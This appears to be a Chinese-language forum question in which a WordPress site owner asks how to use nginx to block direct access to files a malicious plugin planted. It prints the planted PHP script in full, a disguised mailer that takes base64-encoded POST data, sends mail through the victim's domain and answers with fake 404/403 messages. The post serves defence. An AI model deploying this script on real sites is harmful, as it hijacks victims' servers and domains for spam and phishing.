我想在我的WordPress网站上添加一个安全功能,以阻止直接访问添加到WordPress安装根目录的文件,最近我发现一个恶意插件添加了一些文件来发送电子邮件。以下是恶意php 已添加代码。
<?php
$method = $_SERVER[\'REQUEST_METHOD\'];
switch ($method) {
case \'GET\':
//Here Handle GET Request
echo \'###ERROR 404\';
exit;
break;
case \'POST\':
//Here Handle POST Request
foreach($_POST as $key => $x_value) {
$data = base64_decode($x_value) ;
$to_data = explode(\'|\', $data);
$to = $to_data[0];
$x_subject = $to_data[1];
$x_body = $to_data[2];
$from_user = $to_data[3];
$from_email = $to_data[4];
$header = $to_data[5];
$jfnbrsjfq = mail($to, $x_subject, $x_body, $header);
if($jfnbrsjfq){echo \'error 403\';} else {echo \'error 404 : \' . $jfnbrsjfq;}
}
}
在这种情况下,黑客在使用此代码时会通过一些参数使用我的域发送电子邮件。
我想可能有一种方法可以禁止直接访问这些文件来发送电子邮件或任何其他恶意活动。有没有办法限制使用nginx?处理这起案件的最佳方法是什么。如果有任何有用的意见,我将不胜感激。
